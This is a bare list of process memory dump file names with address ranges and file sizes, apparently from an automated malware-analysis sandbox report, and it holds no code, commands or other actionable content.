  • memory/3356-47-0x000001488E3B0000-0x000001488E3D2000-memory.dmp

    Filesize

    136KB

  • memory/4132-25-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-8-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-15-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-0-0x00007FF92A335000-0x00007FF92A336000-memory.dmp

    Filesize

    4KB

  • memory/4132-13-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-26-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-30-0x00007FF92A335000-0x00007FF92A336000-memory.dmp

    Filesize

    4KB

  • memory/4132-10-0x000000001FB20000-0x000000001FB82000-memory.dmp

    Filesize

    392KB

  • memory/4132-9-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-14-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-34-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-35-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-37-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-7-0x000000001C870000-0x000000001C8BC000-memory.dmp

    Filesize

    304KB

  • memory/4132-5-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-6-0x00000000015B0000-0x00000000015B8000-memory.dmp

    Filesize

    32KB

  • memory/4132-4-0x000000001C710000-0x000000001C7AC000-memory.dmp

    Filesize

    624KB

  • memory/4132-3-0x000000001C180000-0x000000001C64E000-memory.dmp

    Filesize

    4.8MB

  • memory/4132-2-0x00007FF92A080000-0x00007FF92AA21000-memory.dmp

    Filesize

    9.6MB

  • memory/4132-1-0x000000001BC00000-0x000000001BCA6000-memory.dmp

    Filesize

    664KB
